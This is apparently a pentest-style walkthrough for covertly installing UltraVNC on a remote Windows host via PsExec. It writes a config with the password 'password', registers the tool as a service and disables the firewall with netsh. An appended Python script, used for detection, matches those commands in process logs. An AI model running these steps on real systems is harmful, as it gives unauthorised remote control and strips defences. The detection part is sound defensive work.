- From a Windows system:
- Download PSExec: http://technet.microsoft.com/en-us/sysinternals/bb897553
- From a Linux system:
- Download UltraVNC:
- Copy the UltraVNC installation binary to the target Windows system using Windows filesharing
net use \\targethost\c$ /user:jdoe
copy UltraVNC_1.0.9.6.1_Setup.exe \\targethost\c$\
- Install UltraVNC with the “/verysilent” argument
psexec \\targethost -u jdoe -i C:\UltraVNC_1.0.9.6.1_Setup.exe /verysilent
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
Password:
C:\UltraVNC_1.0.9.6.1_Setup.exe exited on 192.168.0.10 with error 0.
- Create a local configuration file for UltraVNC. This can be done either by installing your own copy and using its config file, or by using the text below. The configuration file is called “ultravnc.ini”.
[Permissions]
[admin]
FileTransferEnabled=1
FTUserImpersonation=1
BlankMonitorEnabled=1
BlankInputsOnly=0
CaptureAlphaBlending=0
BlackAlphaBlending=0
DefaultScale=1
UseDSMPlugin=0
DSMPlugin=
DSMPluginConfig=
primary=1
secondary=0
SocketConnect=1
HTTPConnect=1
XDMCPConnect=0
AutoPortSelect=0
InputsEnabled=1
LocalInputsDisabled=0
IdleTimeout=0
EnableJapInput=0
QuerySetting=2
QueryTimeout=10
QueryAccept=0
LockSetting=0
RemoveWallpaper=1
RemoveEffects=0
RemoveFontSmoothing=0
RemoveAero=1
DebugMode=0
Avilog=0
path=C:\Program Files\UltraVNC
DebugLevel=0
AllowLoopback=0
LoopbackOnly=0
AllowShutdown=1
AllowProperties=1
AllowEditClients=1
FileTransferTimeout=30
KeepAliveInterval=5
SocketKeepAliveTimeout=10000
DisableTrayIcon=0
MSLogonRequired=0
NewMSLogon=0
ConnectPriority=0
PortNumber=5900
HTTPPortNumber=5800
[ultravnc]
; both passwords are "password"
passwd=DBD83CFD727A145800
passwd2=DBD83CFD727A145800
- Copy the new configuration file to the target Windows machine
copy ultravnc.ini "\\targethost\c$\Program Files\UltraVNC\"
- Install UltraVNC as a Windows service on the target Windows machine
psexec \\targethost -u jdoe -i "C:\Program Files\UltraVNC\winvnc.exe" -install
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
Password:
C:\Program Files\UltraVNC\winvnc.exe exited on 192.168.0.10 with error code 0.
- If the target Windows machine has its Windows firewall enabled and blocking the port, you can disable it
psexec \\targethost -u jdoe -i netsh firewall set opmode disable
- You should now be able to initiate a VNC connection to the target using the password “password”
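A detection-side view of the steps above, as an added example that is not part of the original page: commands launched through PsExec run on the target as children of PSEXESVC.exe, so the three commands in this procedure can be matched and correlated in process-creation logs. The event tuples, host names and rule names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events as seen on the target host:
# (timestamp, host, parent image, command line). All values are made up.
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:05", "WS01", r"C:\Windows\PSEXESVC.exe",
     r"C:\UltraVNC_1.0.9.6.1_Setup.exe /verysilent"),
    ("2024-01-10T09:02:40", "WS01", r"C:\Windows\PSEXESVC.exe",
     r'"C:\Program Files\UltraVNC\winvnc.exe" -install'),
    ("2024-01-10T09:03:10", "WS01", r"C:\Windows\PSEXESVC.exe",
     r"netsh firewall set opmode disable"),
    ("2024-01-10T09:05:00", "WS02", r"C:\Windows\explorer.exe",
     r'"C:\Program Files\UltraVNC\winvnc.exe" -install'),
    ("2024-01-10T11:00:00", "WS03", r"C:\Windows\PSEXESVC.exe",
     r"ipconfig /all"),
]

# One rule per command used in the procedure (rule names are hypothetical).
RULES = {
    "silent_vnc_setup": re.compile(r"ultravnc\S*setup\S*\s.*/verysilent", re.I),
    "vnc_service_install": re.compile(r'winvnc\.exe"?\s+-install\b', re.I),
    "firewall_disabled": re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I),
}


def detect(events, window_minutes=30):
    """Return {host: [rule names]} for hosts where PsExec-spawned processes
    matched at least two different rules within the time window."""
    window = timedelta(minutes=window_minutes)
    hits = {}
    for ts, host, parent, cmdline in events:
        if not parent.lower().endswith("psexesvc.exe"):
            continue  # keep only children of the PsExec service
        for name, rx in RULES.items():
            if rx.search(cmdline):
                hits.setdefault(host, []).append((datetime.fromisoformat(ts), name))
    alerts = {}
    for host, seen in hits.items():
        for start, _ in seen:
            names = {n for t, n in seen if start <= t <= start + window}
            if len(names) >= 2:
                alerts[host] = sorted(set(alerts.get(host, [])) | names)
    return alerts


if __name__ == "__main__":
    for host, rules in detect(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

Requiring two distinct rules inside the window keeps a single administrative PsExec command from alerting on its own.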